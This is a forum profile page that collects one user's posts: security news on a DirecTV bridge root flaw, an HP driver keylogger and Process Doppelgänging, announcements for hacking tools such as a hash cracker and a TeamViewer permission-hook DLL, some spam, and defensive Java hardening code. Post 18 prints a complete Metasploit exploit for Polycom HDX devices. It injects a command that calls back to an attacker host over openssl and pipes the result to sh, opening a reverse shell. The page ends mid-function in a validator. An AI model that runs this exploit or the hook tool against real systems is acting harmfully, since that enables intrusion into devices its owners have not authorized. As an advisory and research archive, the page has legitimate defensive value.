Everything posted by OKQL

  1. Security researchers have publicly disclosed an unpatched zero-day vulnerability in the firmware of AT&T DirecTV WVB kit after trying to get the device manufacturer to patch this easy-to-exploit flaw over the past few months.

    The problem is with a core component of the Genie DVR system that's shipped free of cost with DirecTV and can be easily exploited by hackers to gain root access and take full control of the device, placing millions of people who've signed up to DirecTV service at risk.

    The vulnerability actually resides in WVBR0-25—a Linux-powered wireless video bridge manufactured by Linksys that AT&T provides to its new customers. DirecTV Wireless Video Bridge WVBR0-25 allows the main Genie DVR to communicate over the air with customers' Genie client boxes (up to 8) that are plugged into their TVs around the home.

    Trend Micro researcher Ricky Lawshae, who is also a DirecTV customer, decided to take a closer look at the device and found that Linksys WVBR0-25 hands out internal diagnostic information from the device's web server, without requiring any authentication. When trying to browse to the wireless bridge's web server on the device, Lawshae was expecting a login page or similar, but instead, he found "a wall of text streaming before [his] eyes."

    Once there, Lawshae was able to see the output of several diagnostic scripts containing everything about the DirecTV Wireless Video Bridge, including the WPS pin, connected clients, running processes, and much more. What's more worrisome was that the device was accepting his commands remotely, and at the "root" level too, meaning Lawshae could have run software, exfiltrated data, encrypted files, and done almost anything he wanted on the Linksys device.

    Lawshae also provided a video demonstrating how a quick and straightforward hack lets anyone get a root shell on the DirecTV wireless box in less than 30 seconds, granting them full remote unauthenticated admin control over the device.

    The vulnerability was reported by the ZDI Initiative to Linksys more than six months ago, but the vendor ceased communication with the researcher and had not yet fixed the problem, leaving this easy-to-exploit vulnerability unpatched and open for hackers. So, after over half a year, ZDI decided to publicize the zero-day vulnerability, and recommended that users limit the devices that can interact with Linksys WVBR0-25 "to those that actually need to reach" it in order to protect themselves.

    Via thehackernews.com
  2. It looks awful on the white theme.
  3. macOS and iOS suffer from a kernel double free vulnerability due to IOSurfaceRootUserClient not respecting MIG ownership rules.

    advisory-info.txt

    iOS/MacOS kernel double free due to IOSurfaceRootUserClient not respecting MIG ownership rules
    CVE-2017-13861

    I have previously detailed the lifetime management paradigms in MIG in the writeups for:
    CVE-2016-7612 [https://bugs.chromium.org/p/project-zero/issues/detail?id=926] and
    CVE-2016-7633 [https://bugs.chromium.org/p/project-zero/issues/detail?id=954]

    If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it. If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it.

    If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference on that mach port passed to the external method will be managed by MIG semantics. If the external method returns an error then MIG will assume that the reference was not consumed by the external method and as such the MIG generated code will drop a reference on the port.

    IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port (via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered a port with the same callback function. The external method's error return value propagates via the return value of is_io_connect_async_method back to the MIG generated code which will drop a further reference on the wake_port when only one was taken.

    This bug is reachable from the iOS app sandbox as demonstrated by this PoC.

    Tested on iOS 11.0.3 (11A432) on iPhone 6s (MKQL2CN/A)
    Tested on MacOS 10.13 (17A365) on MacBookAir5,2

    This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

    Found by: ianbeer

    Download GS20171212052309.tgz (2.1 KB)
    https://packetstormsecurity.com/files/145365/macOS-iOS-Kernel-IOSurfaceRootUserClient-Double-Free.html
  4. ShellcodeToAssembly

    Replace in shellcodetoasm.py with your shellcode. { Endian type is little endian. }

    shellcode = ''

    Installation
    git clone https://github.com/blacknbunny/ShellcodeToAssembly.git && cd ShellcodeToAssembly/ && pip2 install -r requirements.txt && python2 shellcodetoasm.py

    Modules manual installation
    pip install -r requirements.txt
    or, equivalently:
    pip2 install -r requirements.txt

    Usage
    python2 shellcodetoasm.py [returnbit] [architecture] [assembly-flavor]

    For example
    python2 shellcodetoasm.py 32 x86 att
    python2 shellcodetoasm.py 64 x86
    The second one defaults to intel.

    Architectures: ARM, ARM64, MIPS, ppc, X86
    Return Bit: 32, 64
    Assembly Flavor: ATT, INTEL

    Demo: https://asciinema.org/a/xjWrXfftZS7BvSzVRd44LuzkP
    Download: ShellcodeToAssembly-master.zip or git clone https://github.com/blacknbunny/ShellcodeToAssembly.git
    Source: https://github.com/blacknbunny/ShellcodeToAssembly
  5. Sponsor for sport

    Try http://www.darkdog-energydrink.com/ (energy drinks, supplements, etc.). What amounts are we talking about?
  6. Investments in Cryptocurrencies

    The calm before the storm!
  7. A new virtual currency, UTN

  8. About
    SeKey is an SSH agent that allows users to authenticate to UNIX/Linux SSH servers using the Secure Enclave.

    How it Works?
    The Secure Enclave is a hardware-based key manager that's isolated from the main processor to provide an extra layer of security. When you store a private key in the Secure Enclave, you never actually handle the key, making it difficult for the key to become compromised. Instead, you instruct the Secure Enclave to create the key, securely store it, and perform operations with it. You receive only the output of these operations, such as encrypted data or a cryptographic signature verification outcome.

    Limitations
    • Only supports MacBook Pro with the Touch Bar and Touch ID
    • Cannot import a preexisting key
    • Stores only 256-bit elliptic curve private keys

    Install & Usage
    Download: sekey-master.zip
    Source: https://github.com/ntrippar/sekey
  9. Pancake is a CLI/Emacs web/gopher/file browser. It utilizes pandoc and external downloaders such as curl, adding support for Gopher directories and plain text files, and invoking external applications (e.g., image and PDF viewers) depending on its configuration. User interaction capabilities are rather basic, as it is intended to be combined with software that provides better user interfaces – such as emacs, rlwrap, tmux, screen.

    cgit: https://git.uberspace.net/pancake/
    github: https://github.com/defanor/pancake.git
    source distribution: pancake-0.1.7.tar.gz
    binaries (Linux, amd64): pancake-0.1.7-bin.tgz
    Debian binary package (amd64): pancake-0.1.7.deb
    See README for more information.

    1. Other text-based web/gopher browsers
    Wikipedia lists a few major text-based web browsers, including Emacs-based ones. Pancake provides a combination of the things I liked about those, and the ones I have missed in those:
    • Multi-protocol support (via curl or other pluggable downloaders).
    • Multi-format support (via pandoc).
    • Plain CLI.
    • An Emacs interface without unnecessary blocking, and general support for embedding.
    • Simplicity and small codebase, thanks to reusing the programs mentioned above.
    • Efficient UI.
    • Use of external programs to handle file types which it doesn't support.
    There are some drawbacks as well:
    • A large executable file (70+ Mio uncompressed).
    • Not as hackable in Elisp as pure (or mostly) Elisp browsers.
    • Not as portable as C or Elisp ones.
    • A relatively small set of features.
    • Somewhat worse HTML parsing and rendering in some cases.
    • Quite possibly more, depending on one's preferences.

    2. Installation
    2.1 Pancake
    cabal install would build and install pancake and its documentation. Alternatively, basic Debian packages and binary releases are available.
    2.2 Emacs interface
    M-x package-install-file RET /path/to/pancake.el RET.
    To set it as your default emacs browser:
    (require 'pancake)
    (setq browse-url-browser-function 'pancake-browse-url)
    To load and show all images automatically (not just after saving them manually):
    (add-hook 'pancake-display-hook 'pancake-load-images)
    Though it might be desirable to write a wrapper to only show those on specific websites, e.g. webcomics, and perhaps specific images only.

    3. Screenshots
    https://defanor.uberspace.net/projects/pancake/
  10. debugProxy is an HTTP/S proxy server that can be used by any device that supports using HTTP proxy servers. Additionally it is a web application that allows you to view, pause and modify traffic sent through the proxy. This means, for example, you can use debugProxy on your computer or tablet to view the traffic being sent from your phone or IoT device. For information on configuring devices or applications to use debugProxy have a look at our documentation pages.

    cURL
    If you have the curl program installed on your computer, you can test if the proxy works with this command:
    curl https://www.google.com/ --insecure --proxy fagiq:rhrnx@debugproxy.com:8080
    If this command works as expected the requests and responses will be on the dashboard.

    SSL Traffic
    The proxy just works for HTTP requests; however, to make HTTPS and HTTP2 requests a root certificate needs to be downloaded and installed. The debugProxy root certificates can be found on the certificates page. On most smart phones you can install the debugProxy root certificate by simply clicking on the certificate for your device.

    Try it now! Source: https://debugproxy.com/
  11. HP has an awful history of 'accidentally' leaving keyloggers on its customers' laptops. At least two times this year, HP laptops were caught with pre-installed keylogger or spyware applications. I was following a tweet made by a security researcher claiming to have found a built-in keylogger in several HP laptops, and now he went public with his findings.

    A security researcher who goes by the name of ZwClose discovered a keylogger in several Hewlett-Packard (HP) laptops that could allow hackers to record your every keystroke and steal sensitive data, including passwords, account information, and credit card details. The keylogger was found embedded in the SynTP.sys file, a part of the Synaptics touchpad driver that ships with HP notebook computers, leaving more than 460 HP Notebook models vulnerable to hackers.

    Although the keylogger component is disabled by default, hackers can make use of available open source tools for bypassing User Account Control (UAC) to enable the built-in keylogger "by setting a registry value." Here's the location of the registry key:
    HKLM\Software\Synaptics\%ProductName%
    HKLM\Software\Synaptics\%ProductName%\Default

    The researcher reported the keylogger component to HP last month, and the company acknowledged the presence of the keylogger, saying it was actually "a debug trace" which was left accidentally, but has now been removed. The company has released a driver update for all the affected HP Notebook models. If you own an HP laptop, you can look for updates for your model. The list of affected HP notebooks can be found at the HP Support website.

    This is not the very first time that a keylogger has been detected in HP laptops. In May this year, a built-in keylogger was found in an HP audio driver that was silently recording all of its users' keystrokes and storing them in a human-readable file.

    Get the list of affected hardware and patch here: https://support.hp.com/us-en/document/c05827409
    Via thehackernews.com
  12. Selling RDP

    99.9% Up-time Guarantee, Unlimited Bandwidth, 1 GBPS Port, Pre-Installed Software Available. Sold.
  13. A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools. Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of the Windows process loader. enSilo security researchers Tal Liberman and Eugene Kogan, who discovered the Process Doppelgänging attack, presented their findings today at the Black Hat 2017 Security conference held in London.

    Process Doppelgänging Works on All Windows Versions

    Apparently, the Process Doppelgänging attack works on all modern versions of the Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10. Tal Liberman, the head of the research team at enSilo, told The Hacker News that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products. In a Process Hollowing attack, hackers replace the memory of a legitimate process with malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running. Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore.

    On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of the Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows.

    Here's How the Process Doppelgänging Attack Works:

    Before going further on how this new code injection attack works, you need to understand what a Windows NTFS Transaction is and how an attacker could leverage it to evade his malicious actions. NTFS Transaction is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically. An NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely.

    According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below:
    • Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file.
    • Load—create a memory section from the modified (malicious) file.
    • Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed.
    • Animate—bring the doppelganger to life. Use the older implementation of the Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs."

    Process Doppelgänging Evades Detection from Most Antiviruses

    Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advanced forensic tools. In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection. When the researchers ran Mimikatz normally on a Windows operating system, the Symantec antivirus solution caught the tool immediately, as shown below:
    [Image: Symantec detecting Mimikatz]
    However, Mimikatz ran stealthily, without antivirus displaying any warning, when executed using Process Doppelgänging, as shown in the image at the top of this article.

    Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year. But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes a BSOD (blue screen of death), which crashes users' computers. Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10.

    I don't expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks.

    This is not the very first time that enSilo researchers have discovered a malware evasion technique. Previously they discovered and demonstrated the AtomBombing technique, which also abused a design weakness in the Windows OS. In September, enSilo researchers also disclosed a 17-year-old programming error in the Microsoft Windows kernel that prevented security software from detecting malware at runtime when loaded into system memory.

    Via thehackernews.com
  14. A new virtual currency, UTN

    It was already posted; you're spamming so much you're breaking the rules.
  15. Dagon - Advanced Hash Manipulation

    Named after the prince of Hell, Dagon (day-gone) is an advanced hash cracking and manipulation system, capable of bruteforcing multiple hash types, creating bruteforce dictionaries, automatic hashing algorithm verification, random salt generation from Unicode to ASCII, and much more.

    Note: Dagon comes complete with a Hash Guarantee: I personally guarantee that Dagon will be able to crack your hash successfully. At any point Dagon fails to do so, you will be given a choice to automatically create a Github issue with your hash. Once this issue is created, I will try my best to crack your hash for you. The Github issue is completely anonymous, and no questions will be asked. This is my way of thanking you for using Dagon. There are alternatives to using the automatic issue creator. If you do not want your hash publicly displayed, and feel Dagon has failed you, feel free to create your own issue. Or send an email with the hash information to dagonhashguarantee@gmail.com

    Screenshots
    • Bruteforcing made easy with a built-in wordlist creator if you do not specify one. The wordlist will create 100,000 strings to use.
    • Verify what algorithm was used to create that hash you're trying to crack. You can specify to view all possible algorithms by providing the -L flag (some algorithms are not implemented yet).
    • Random salting, unicode random salting, or you can make your own choice on the salt.

    Demo video

    Download
    Preferably, clone the repository with git clone https://github.com/ekultek/dagon.git; alternatively you can download the zip or tarball here.

    Basic usage
    For full functionality of Dagon please reference the homepage here or the user manual.
    python dagon.py -h
      This will run the help menu and provide a list of all possible flags
    python dagon.py -c <HASH> --bruteforce
      This will attempt to bruteforce a given hash
    python dagon.py -l <FILE-PATH> --bruteforce
      This will attempt to bruteforce a given file full of hashes (one per line)
    python dagon.py -v <HASH>
      This will try to verify the algorithm used to create the hash
    python dagon.py -V <FILE-PATH>
      This will attempt to verify each hash in a file, one per line

    Installation
    Dagon requires python version 2.7.x to run successfully.
    git clone https://github.com/ekultek/dagon.git
    cd Dagon
    pip install -r requirements.txt
    This should install all the dependencies that you will need to run Dagon.

    Contributions
    All contributions are greatly appreciated and helpful. When you contribute you will get your name placed on the homepage underneath contributions with a link to your contribution. You will also get massive respect from me, and that's a pretty cool thing. What I'm looking for in contributions is some of the following:
    • Hashing algorithm creations, specifically: a quicker MD2 algorithm, full Tiger algorithms, Keychain algorithms for cloud and agile
    • More wordlists to download from; please make sure that the link is encoded
    • Rainbow table attack implementation
    • More regular expressions to verify different hash types

    Source: https://github.com/Ekultek/dagon
  16. Researchers: Eran Vaknin, Gal Elbaz, Alon Boxiner, Oded Vanunu

    Latest research from the Check Point Research Team has revealed several vulnerabilities that put each and every organization that does any type of Java/Android development at great risk of a threat actor exploiting these vulnerabilities and penetrating them. The vulnerabilities in question are in the developer tools, both downloadable and cloud based, that the Android application ecosystem, the largest application community in the world, is using. This includes the tools that all Java/Android programmers use to build their companies' business applications and that security analysts and reverse engineers use to do their work.

    As seen in WikiLeaks' 'Vault 7' release earlier this year, the CIA and NSA are exploiting vulnerabilities in products of companies of all sizes, all over the world. Earlier this year we saw incidents of the CIA hacking CCleaner, Notepad++ and many more, with the aim of spreading malware into organizations and acquiring information on their users, and the companies themselves.

    Through our own research we have found several vulnerabilities that affect the most common Android IDEs – Google's Android Studio and JetBrains' IntelliJ IDEA and Eclipse, as well as the major reverse engineering tools for Android applications such as APKTool, the Cuckoo-Droid service and more. Our research below illustrates how we exploited these tools to gain access to internal files. Since this research, Check Point reported the discovery to APKTool developers and the other IDE companies back in May 2017. In turn, Google and JetBrains have verified and acknowledged the security issues and have since effectively deployed a fix.

    Technical Details – From XXE to RCE: Attacking The Second Layer

    The first stage of our research was focused on APKTool (Android Application Package Tool). As the most popular tool for reverse engineering third party Android apps, APKTool is used for supporting custom platforms, analyzing applications and much more, including the decoding and rebuilding of resources. The two main features of the APKTool are:
    1. Decompiling an APK file.
    2. Building an APK file.

    From our research we found that APKTool is vulnerable in both of these main features. By looking at the source code of APKTool, we managed to identify an XML External Entity (XXE) vulnerability, due to the fact that the configured XML parser of APKTool does not disable external entity references when parsing an XML file within the program. The vulnerable function is called loadDocument and it is being used in both core functionalities – 'Build' and 'Decompile' – of APKTool.

    The vulnerability exposes the whole OS file system of APKTool users, and as a result, attackers could then potentially retrieve any file on the victim's PC by using a malicious "AndroidManifest.xml" file that exploits an XXE vulnerability, which could then be sent to a remote attacker server. And this attack scenario is just one of many possible XXE attack techniques that could lead to harmful outcomes.

    Realizing the enormity of this vulnerability to the Android developer and researcher community, we extended our research to the vulnerable XML parser called "DocumentBuilderFactory", which is being used in the APKTool project.

    Vulnerabilities in Developer Tools

    This led us to find multiple vulnerable implementations of the XML parser within other projects. Moreover, we identified that the most popular IDEs that are used for building Android applications are affected – including Intellij, Eclipse, and Android Studio. By simply loading the malicious "AndroidManifest.xml" file as part of any Android project, the IDEs start spitting out any file configured by the attacker.

    To demonstrate this vulnerability, we have uploaded a malicious project library to GitHub and cloned it to an Android Studio project.
    [Image: Example of a Malicious Github Project With The XXE Payload]
    [Image: Cloned to Android Studio]
    [Image: Result]
    The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker's server without the user being aware of it – see image below:
    [Image]

    Furthermore, we have found another attack scenario that can be used in the wild to attack a massive range of Android developers by injecting a malicious AAR (Android Archive Library) containing our XXE payload into repositories. It is possible, for example, to upload an infected AAR to a public repository such as the central Maven repository, though for demonstration purposes we have uploaded an infected AAR to a local repository. Cloning the infected AAR from the repository by the victim would allow the attacker to steal sensitive files such as configuration files, source code, company digital proprietary and much more from the OS file system.
    [Image: Uploading a Malicious AAR to Local Repository]
    [Image: Adding the AAR to Android Studio Project]
    [Image: Result]
    The attack was delivered successfully, and the protected file was stolen and sent to the presented attacker's server without the user being aware of it.

    Further research of the APKTool then led us to find an additional vulnerability that allows us to execute OS commands on a victim's PC. For advanced use of APKTool there is a configuration file named "APKTOOL.YML". This file contains an interesting section called "unknownFiles", which allows users to include a non-standard file location that will be placed correctly in the rebuild process of an APK. The selected files are saved on the filesystem in the 'Unknown' folder. A legitimate "APKTOOL.YML" file structure looks like this:
    [Image: legitimate APKTOOL.YML structure]

    By manipulating the path of the "unknownFiles" section inside the "APKTOOL.YML" file, it is possible to inject arbitrary files anywhere on the file system (Path Traversal). This is due to the fact that APKTool does not validate the path to which the unknown files will be extracted from the packed APK. Indeed, injecting arbitrary files anywhere in the filesystem leads to full Remote Code Execution (RCE) – meaning that any APKTool user/service that tries to decode a crafted malicious APK is vulnerable to RCE.

    For demonstration purposes, we have created a Web Application similar to the official online APK decoder ( https://apk.tools ). APKTool will extract the malicious file (in this case we used a PHP web shell) to the wwwroot folder of that server:
    [Image]
    After building the APK with the modified configuration file, the result is a compressed APK with our malicious file inside the malformed path. Uploading the APK to the demo site allows the attacker to execute OS commands on the web application server. This attack could thus be launched against any online/offline service that decodes APKs behind the scenes using APKTool.

    The way we chose to demonstrate this vulnerability of course is just one of many possible attack methods that can be used to achieve full RCE. Indeed, the Path Traversal method lets us copy any file to any location on the file system, making the attack surface wide and varied. All the attack methods demonstrated above are cross-platform and generic and, as APKTool is designed to work on top of several operating systems, it is also possible to attack any system on which it operates without restriction or limitation.

    It is impossible to estimate the number of users of this well-known open source project. Yet, knowing that among them are some large services and companies (e.g. https://apk.tools, http://www.javadecompilers.com/APKTool, https://www.apkdecompilers.com/, http://undroid.av-comparatives.info, Cuckoo droid and many more), we contacted the APKTool developer and IDE companies and are pleased to report that they all fixed the security issues and released updated and improved versions of their products.

    Source: https://research.checkpoint.com/parsedroid-targeting-android-development-research-community/
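    The two defects described in the post above, the DocumentBuilderFactory that resolves external entities and the unvalidated "unknownFiles" extraction path, both reduce to a configuration or check that the decoding tool should perform before touching the filesystem. The following is an added example, not Check Point's or APKTool's own code: a hypothetical SafeApkDecoding helper (class and method names assumed) that configures DocumentBuilderFactory so any DOCTYPE in a manifest is refused before an entity can be resolved, and that normalizes an unknownFiles entry against the output directory and rejects anything that would land outside it. The manifest text and the entry names in main are constructed inputs.

```java
import java.io.IOException;
import java.io.StringReader;
import java.nio.file.Path;
import java.nio.file.Paths;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

// Hypothetical helper (not part of APKTool) showing the two checks the
// post's findings call for: an XXE-safe parser and an output-path check.
public class SafeApkDecoding {

    // A plain DocumentBuilderFactory.newInstance() resolves external entities,
    // which is the vulnerable shape the post describes. The hardened factory
    // below refuses DOCTYPE outright and disables every entity/DTD feature,
    // so a manifest carrying an external entity is rejected before any
    // file or URL is read.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // Parse manifest XML from a string with the given factory.
    static Document parseManifest(DocumentBuilderFactory dbf, String xml)
            throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilder db = dbf.newDocumentBuilder();
        return db.parse(new InputSource(new StringReader(xml)));
    }

    // Path-traversal check for an "unknownFiles" entry: resolve the entry name
    // against the output directory, normalize away "." and "..", and reject
    // any result that does not remain inside the output directory. Absolute
    // entry names fail the same check because resolve() returns them as-is.
    static Path resolveInside(Path outputDir, String entryName) throws IOException {
        Path base = outputDir.toAbsolutePath().normalize();
        Path target = base.resolve(entryName).normalize();
        if (!target.startsWith(base)) {
            throw new IOException("unknownFiles entry escapes output directory: " + entryName);
        }
        return target;
    }

    public static void main(String[] args) throws Exception {
        // Constructed manifest carrying a DOCTYPE with an external entity;
        // the entity URI is a placeholder path, not a real target.
        String manifest = "<?xml version=\"1.0\"?>\n"
                + "<!DOCTYPE manifest [<!ENTITY ext SYSTEM \"file:///placeholder/secret.txt\">]>\n"
                + "<manifest package=\"&ext;\"/>";

        try {
            parseManifest(hardenedFactory(), manifest);
            System.out.println("unexpected: hardened parser accepted a DOCTYPE");
        } catch (SAXException e) {
            // Expected: the document is rejected before the entity is resolved.
            System.out.println("hardened parser refused the manifest: " + e.getMessage());
        }

        // Constructed unknownFiles entries: one legitimate, two that traverse out.
        Path out = Paths.get("build", "unknown");
        System.out.println("ok       -> " + resolveInside(out, "assets/extra.bin"));
        for (String bad : new String[] { "../../outside.txt", "/absolute/path.txt" }) {
            try {
                resolveInside(out, bad);
                System.out.println("unexpected: accepted " + bad);
            } catch (IOException e) {
                System.out.println("rejected -> " + e.getMessage());
            }
        }
    }
}
```

    The disallow-doctype-decl feature is the single switch that closes the XXE case completely, since a manifest has no legitimate need for a DOCTYPE; the remaining features are belt-and-braces for parsers where that feature is unsupported. For the path check, normalizing before the startsWith comparison is what defeats "../" sequences, and comparing Path objects rather than strings avoids a prefix like "build/unknown2" matching "build/unknown".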
  17. A proof of concept injectable C++ dll, that uses naked inline hooking and direct memory modification to change your TeamViewer permissions.

    Features
    As the Server - Enables extra menu item options on the right side pop-up menu. Most useful so far to enable the "switch sides" feature which is normally only active after you have already authenticated control with the client, and initiated a change of control/sides.
    As the Client - Allows for control of mouse with disregard to the server's current control settings and permissions.

    Demo

    Rundown
    Utilizes signature/pattern scanning to dynamically locate key parts in the code at which the assembly registers hold pointers to interesting classes. Applies inline naked hooks, a.k.a. code caves, to hi-jack the pointers to use for modification via direct memory access to their reversed classes. Inject and follow the steps.

    Requirements
    Your favorite Manual Mapper, PE Loader, DLL Injector; inject into "TeamViewer.exe". This version was built on Windows 10, for TeamViewer x86 Version 13.0.5058 (other versions of TeamViewer have not been tested, but with more robust signatures it may work; linux not supported).

    Disclaimer
    Developed for educational purposes as a proof of concept for testing. I do not condone or support the use of this software for unethical or illicit purposes. No responsibility is held or accepted for misuse.

    Credit
    @timse93 - Research and Testing

    Download: TeamViewer_Permissions_Hook_V1-master.zip
    Source: https://github.com/gellin/TeamViewer_Permissions_Hook_V1
  18. Within Polycom command shell, a command execution flaw exists in lan traceroute, one of the dev commands, which allows for an attacker to execute arbitrary payloads with telnet or openssl.

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Polycom Shell HDX Series Traceroute Command Execution',
      'Description'    => %q{
        Within Polycom command shell, a command execution flaw exists in lan traceroute,
        one of the dev commands, which allows for an attacker to execute arbitrary payloads
        with telnet or openssl.
      },
      'Author'         => [
        'Mumbai', #
        'staaldraad', # https://twitter.com/_staaldraad/
        'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass
        'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them
      ],
      'References'     => [
        ['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/']
      ],
      'DisclosureDate' => 'Nov 12 2017',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        => [[ 'Automatic', {} ]],
      'Payload'        => {
        'Space'       => 8000,
        'DisableNops' => true,
        'Compat'      => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl' }
      },
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(23),
        OptString.new('PASSWORD', [ false, "Password to access console interface if required." ]),
        OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
        OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
      ])
  end

  def check
    connect
    Rex.sleep(1)
    res = sock.get_once
    disconnect
    # A nil response must short-circuit before .empty? is called
    # (the original "!res && !res.empty?" raised NoMethodError on nil).
    if !res || res.empty?
      return Exploit::CheckCode::Unknown
    elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/
      return Exploit::CheckCode::Detected
    end
    Exploit::CheckCode::Unknown
  end

  def exploit
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service")
    end

    #
    # Obtain banner information
    #
    sock = connect
    Rex.sleep(2)
    banner = sock.get_once
    vprint_status("Received #{banner.length} bytes from service")
    vprint_line("#{banner}")

    if banner =~ /password/i
      print_status("Authentication enabled on device, authenticating with target...")
      if datastore['PASSWORD'].nil?
        print_error("#{peer} - Please supply a password to authenticate with")
        return
      end
      # couldn't find where to enable auth in web interface or telnet...but according to other module it exists..here in case.
      sock.put("#{datastore['PASSWORD']}\n")
      res = sock.get_once
      if res =~ /Polycom/
        print_good("#{peer} - Authenticated successfully with target.")
      elsif res =~ /failed/
        print_error("#{peer} - Invalid credentials for target.")
        return
      end
    elsif banner =~ /Polycom/ # praise jesus
      print_good("#{peer} - Device has no authentication, excellent!")
    end
    do_payload(sock)
  end

  def do_payload(sock)
    # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
    cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])

    # Start a listener
    start_listener(true)

    # Figure out the port we picked
    cbport = self.service.getsockname[2]

    cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
    sock.put(cmd)

    if datastore['VERBOSE']
      Rex.sleep(2)
      resp = sock.get_once
      vprint_status("Received #{resp.length} bytes in response")
      vprint_line(resp)
    end

    # Give time for our command to be queued and executed
    1.upto(5) do
      Rex.sleep(1)
      break if session_created?
    end
  end

  def stage_final_payload(cli)
    print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
    cli.put(payload.encoded + "\n")
  end

  def start_listener(ssl = false)
    comm = datastore['ListenerComm']
    if comm == 'local'
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    self.service = Rex::Socket::TcpServer.create(
      'LocalPort' => datastore['CBPORT'],
      'SSL'       => ssl,
      'SSLCert'   => datastore['SSLCert'],
      'Comm'      => comm,
      'Context'   => {
        'Msf'        => framework,
        'MsfExploit' => self
      }
    )

    self.service.on_client_connect_proc = proc { |client|
      stage_final_payload(client)
    }

    # Start the listening service
    self.service.start
  end

  # Shut down any running services
  def cleanup
    super
    if self.service
      print_status("Shutting down payload stager listener...")
      begin
        self.service.deref if self.service.is_a?(Rex::Service)
        if self.service.is_a?(Rex::Socket)
          self.service.close
          self.service.stop
        end
        self.service = nil
      rescue ::Exception
      end
    end
  end

  # Accessor for our TCP payload stager
  attr_accessor :service
end
```

Source: https://packetstormsecurity.com/files/145225/Polycom-Shell-HDX-Series-Traceroute-Command-Execution.html
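The root cause in the post above is a diagnostic command that passes its argument to a shell, so command substitution in the "hostname" runs as root. The fix on the device side is an allow-list: accept only something that is actually a hostname or IP literal, and exec traceroute with an argument vector rather than a command string. The following is an added example of that validation, not Polycom's code; the command parser and the constructed input lines are hypothetical.

```python
import ipaddress
import re

# One DNS label per RFC 1123: letters, digits and hyphens, 1-63 characters,
# not starting or ending with a hyphen.
_LABEL_RE = re.compile(r'^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$')


def is_valid_traceroute_target(arg: str) -> bool:
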